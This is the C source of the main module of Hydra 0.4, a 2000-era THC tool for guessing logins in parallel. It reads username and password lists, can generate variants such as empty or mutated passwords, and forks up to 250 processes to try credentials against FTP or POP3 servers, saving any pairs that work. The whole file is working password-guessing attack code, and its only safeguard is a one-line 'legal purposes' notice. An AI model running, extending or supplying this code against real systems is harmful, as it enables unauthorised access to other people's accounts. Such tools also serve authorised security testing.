/*  
 * Hydra 0.4 - a parallel login hacker 
 * (c) 2000 by Van Hauser / THC <vh@reptile.rug.ac.be>, 
 *             Plasmoid / THC <plasmoid@pimmel.com> 
 * The Hacker's Choice - http://www.infowar.co.uk/thc 
 */

#include <hydra.h>
#include <config.h>

extern void service_ftp(unsigned long int ip, int sp,
			unsigned char options, char *miscptr, FILE * fp);
extern void service_pop3(unsigned long int ip, int sp,
			 unsigned char options, char *miscptr, FILE * fp);

/* ADD NEW SERVICES HERE */
#define SERVICES  "ftp pop3"

#define MAXBUF    260
#define MAXTASKS  250

char *prg, *tmp;
extern char HYDRA_EXIT[5];
size_t extra;
int killed = 0;

void help(char *program)
{

    printf("%s %s (c) 2000 by Van Hauser / THC <vh@reptile.rug.ac.be>\n"
	   "                      Plasmoid / THC <plasmoid@pimmel.com>\n"
	   "Syntax:\n"
	   "    %s [Options] server service\n\n"
	   "Options:\n"
	   "   -e        try to login in additionally with null password or same as login.\n"
	   "   -E        expand passwords (1st upcase,all upcase,reverse,ap-/prepend 1).\n"
	   "   -l LOGIN  login with LOGIN name.\n"
	   "   -L FILE   read in (several) login names from FILE.\n"
	   "   -p P      try password P.\n"
	   "   -P FILE   read in (several) passwords from FILE.\n"
	   "   -C FILE   colon seperated \"login:ftp\" format, instead -L/-P option\n"
	   "   -o FILE   write found login/password pairs to FILE instead of stdout.\n"
	   "   -t TASKS  run up to TASKS number of connects in parallel (default: 1).\n"
	   "   -m STRING some service modules need additional input, this is the option.\n"
	   "   server    the server to connect to.\n"
	   "   service   the service to authenticate to.\n\n"
	   "Supported service protocols: %s\n"
	   "Use this tool only for legal purposes!\n",
	   PACKAGE, VERSION, program, SERVICES);
    exit(-1);
}


void bail(char *text)
{
    fprintf(stderr, "Error: %s\n", text);
    exit(-1);
}

void killed_childs(int signo)
{
    killed++;
}

unsigned long int countlines(FILE * fp)
{
    size_t lines = 0, size = 0;
    char *buf = malloc(MAXBUF);
    while (!feof(fp)) {
	fgets(buf, MAXBUF, fp);
	if (buf[0] != 0)
	    size += strlen(buf);
	lines++;
    };
    rewind(fp);
    size++;
    extra = size;
    return lines;
}

void fill_mem(char *ptr, FILE * fp)
{
    while (!feof(fp)) {
	if (fgets(tmp, MAXBUF, fp) != NULL)
	    if (tmp[0] != 0) {
		if (tmp[strlen(tmp) - 1] == '\n')
		    tmp[strlen(tmp) - 1] = '\0';
		if (tmp[strlen(tmp) - 1] == '\r')
		    tmp[strlen(tmp) - 1] = '\0';
		memcpy(ptr, tmp, strlen(tmp));
		ptr += strlen(tmp);
		*ptr = '\0';
		ptr++;
	    }
    }
    fclose(fp);
}

int main(int argc, char *argv[])
{
    int tasks = 1, extend_login = 0, extend_pass = 0, verbose = 0;
    unsigned char options = 0;
    char *login = NULL, *loginfile = NULL, *pass = NULL, *passfile =
	NULL, *colonfile = NULL, *outfile_ptr = NULL;
    char *miscptr = NULL, *server, *service;

    char *login_ptr, *pass_ptr, *pass_ptr_save, *csv_ptr;
    FILE *lfp, *pfp, *cfp, *ofp = stdout;
    pid_t pids[MAXTASKS];
    int socketpairs[MAXTASKS][2];
    size_t countlogin = 1, sizelogin = 0, countpass = 1, sizepass = 0;
    unsigned long int math2;
    struct hostent *target;
    unsigned long int ip;
    int i;

    prg = argv[0];
    if (argc < 4)
	help(argv[0]);
    tmp = malloc(MAXBUF);

    while ((i = getopt(argc, argv, "eEvl:L:p:P:o:C:t:m:")) >= 0) {
	switch (i) {
	case 'e':
	    extend_login = 1;
	    options = (options & 254) + 1;
	    break;
	case 'E':
	    extend_pass = 1;
	    break;
	case 'v':
	    verbose = 1;
	    break;
	case 'l':
	    login = optarg;
	    break;
	case 'L':
	    loginfile = optarg;
	    break;
	case 'p':
	    pass = optarg;
	    break;
	case 'P':
	    passfile = optarg;
	    break;
	case 'o':
	    outfile_ptr = optarg;
	    break;
	case 'C':
	    colonfile = optarg;
	    break;
	case 't':
	    tasks = atoi(optarg);
	case 'm':
	    miscptr = optarg;
	    break;
	default:
	    help(argv[0]);
	}
    }
    if (optind + 2 != argc)
	help(argv[0]);
    server = argv[argc - 2];
    service = argv[argc - 1];

    i = 0;
    if (strcmp(service, "ftp") == 0)
	i = 1;
    if (strcmp(service, "pop3") == 0)
	i = 1;
/* ADD NEW SERVICES HERE */
    if (i == 0)
	bail("Unknown service");

    if (login == NULL && loginfile == NULL && colonfile == NULL)
	bail
	    ("I need at least either the -l, -L or -C option to know the login");
    if (colonfile != NULL && ((login != NULL || loginfile != NULL)
			      || (pass != NULL && passfile != NULL)))
	bail
	    ("The -C option is standalone, dont use it with -l/L and -p/P !");
    if (extend_login == 0 && extend_pass == 0 && pass == NULL
	&& passfile == NULL && colonfile == NULL)
	bail
	    ("I need at least the -e, -E, -p or -P option to have some passwords!");
    if (tasks < 1 || tasks > MAXTASKS)
	bail("Option -t needs to be a number between 1 and 250");
    if (loginfile != NULL) {
	if ((lfp = fopen(loginfile, "r")) == NULL)
	    bail("File for logins not found!");
	countlogin = countlines(lfp);
	sizelogin = extra;
	if (countlogin == 0)
	    bail("File for logins is empty!");
	login_ptr = malloc(sizelogin);
	fill_mem(login_ptr, lfp);
    } else
	login_ptr = login;
    if (passfile != NULL) {
	if ((pfp = fopen(passfile, "r")) == NULL)
	    bail("File for passwords not found!");
	countpass = countlines(pfp);
	sizepass = extra;
	if (countpass == 0)
	    bail("File for passwords is empty!");
	pass_ptr = malloc(sizepass);
	fill_mem(pass_ptr, pfp);
    } else
	pass_ptr = pass;
    if (colonfile != NULL) {
	if ((cfp = fopen(colonfile, "r")) == NULL)
	    bail("File with login:password information not found!");
	countlogin = countlines(cfp);
	sizelogin = extra;
	if (countlogin == 0)
	    bail("File for login:password information is empty!");
	csv_ptr = malloc(sizelogin);
	fill_mem(csv_ptr, cfp);
	countpass = 1;
	pass_ptr = login_ptr = csv_ptr;
	while (*pass_ptr != '\0' && *pass_ptr != ':')
	    pass_ptr++;
	if (*pass_ptr == ':') {
	    *pass_ptr = '\0';
	    pass_ptr++;
	} else {
	    fprintf(stderr, "Invalid line in colonfile: %s\n", login_ptr);
	    pass_ptr = HYDRA_EXIT;
	}
    }

    math2 = countlogin * countpass;
    if (extend_login)
	math2 = math2 + countpass + countpass;
    if (verbose)
	printf
	    ("Logins: %d    Passwords: %d     Login tries altogether: %lu\n",
	     countlogin, countpass, math2);
    if (math2 < tasks) {
	tasks = math2;
	fprintf(stderr,
		"Warning: More tasks defined than login/pass pairs to be done. Tasks reduced to %d.\n",
		tasks);
    }
    math2 = math2 / tasks;
    if (verbose)
	printf("Approx. login tries per task: %lu (%d tasks)\n", math2,
	       tasks);

    /* resolve target */
    if ((ip = inet_addr(server)) == -1) {
	if ((target = gethostbyname(server)) == NULL) {
	    perror(server);
	    exit(-1);
	}
	memcpy(&ip, target->h_addr, target->h_length);
    }

    if (outfile_ptr != NULL) {
	if ((ofp = fopen(outfile_ptr, "a+")) == NULL) {
	    bail("Error creating outputfile");
	}
	fprintf(ofp, "# %s %s -> %s %s\n", PACKAGE, VERSION, server,
		service);
    }

    /* fork attack processes */
    signal(SIGCHLD, killed_childs);
    for (i = 0; i < tasks; i++) {
	if (socketpair(PF_UNIX, SOCK_STREAM, 0, socketpairs[i]) != 0) {
	    perror("socketpair failed");
	    socketpairs[i][0] = -1;
	} else {
	    if ((pids[i] = fork()) == 0) {
		if (strcmp(service, "ftp") == 0)
		    service_ftp(ip, socketpairs[i][1], options, miscptr,
				ofp);
		if (strcmp(service, "pop3") == 0)
		    service_pop3(ip, socketpairs[i][1], options, miscptr,
				 ofp);
/* ADD NEW SERVICES HERE */
		return 0;
	    }
	    if (pids[i] > 0) {
		write(socketpairs[i][1], "N", 1);
		fcntl(socketpairs[i][0], F_SETFL, O_NONBLOCK);
	    } else {
		perror("Fork for children failed");
		socketpairs[i][0] = -1;
	    }
	}
    }

    /* feed the children with login/pass data - be a good mom */
    {
	int a, b, c, done, length;
	char sb[MAXBUF], rc;
	pass_ptr_save = pass_ptr;

	for (a = 0; a < countlogin; a++) {
	    for (b = 0; b < countpass; b++) {
		done = 0;
		if ((char *) pass_ptr != (char *) &HYDRA_EXIT) {
		    if (verbose)
			printf("New pair: login \"%s\" - pass \"%s\"\n",
			       login_ptr, pass_ptr);
		    while (!done) {
			i = 0;
			for (c = 0; c < tasks; c++) {
			    if (socketpairs[c][0] >= 0) {
				if (read(socketpairs[c][0], &rc, 1) > 0) {
				    if (rc == 'N') {
					done = 1;
					memset(&sb, 0, sizeof(sb));
					length = strlen(login_ptr) + 1;
					strcpy(sb, login_ptr);
					strcpy(sb + length, pass_ptr);
					length += strlen(pass_ptr) + 1;
					write(socketpairs[c][0], sb,
					      length);
					if (verbose)
					    printf
						("Pair sent to process %d\n",
						 pids[c]);
				    } else {
					if (verbose)
					    printf
						("Process %d reported it quit\n",
						 pids[c]);
					socketpairs[c][0] = -1;
					i++;
				    }
				}
			    } else
				i++;
			}
			if (i >= tasks) {
			    printf("All childrens are dead.\n");
			    exit(-1);
			}
		    }
		}
		if (b + 1 < countpass) {
		    while (*pass_ptr != '\0')
			pass_ptr++;
		    pass_ptr++;
		}
	    }
	    if (a + 1 < countlogin) {
		while (*login_ptr != '\0')
		    login_ptr++;
		login_ptr++;
	    }
	    if (colonfile == NULL) {
		pass_ptr = pass_ptr_save;
	    } else {
		if ((char *) pass_ptr != (char *) &HYDRA_EXIT) {
		    while (*login_ptr != '\0')
			login_ptr++;
		    login_ptr++;
		}
		pass_ptr = login_ptr;
		while (*pass_ptr != '\0' && *pass_ptr != ':')
		    pass_ptr++;
		if (*pass_ptr == ':') {
		    *pass_ptr = '\0';
		    pass_ptr++;
		} else {
		    if (strlen(login_ptr) > 0)
			fprintf(stderr, "Invalid line in colonfile: %s\n",
				login_ptr);
		    pass_ptr = HYDRA_EXIT;
		}
	    }
	}
	i = 0;
	if (verbose)
	    printf("Waiting for children to finnish their jobs ...\n");
	while (i < tasks) {
	    i = 0;
	    for (c = 0; c < tasks; c++) {
		if (socketpairs[c][0] >= 0) {
		    if (read(socketpairs[c][0], &rc, 1) > 0) {
			i++;
			write(socketpairs[c][0], HYDRA_EXIT,
			      sizeof(HYDRA_EXIT));
			socketpairs[c][0] = -1;
		    }
		} else
		    i++;
	    }
	}
	while (killed < tasks)
	    sleep(1);
    }
    fclose(ofp);

    /* yeah we did it */
    if (verbose)
	printf("Finished.\n");
    return 0;
}
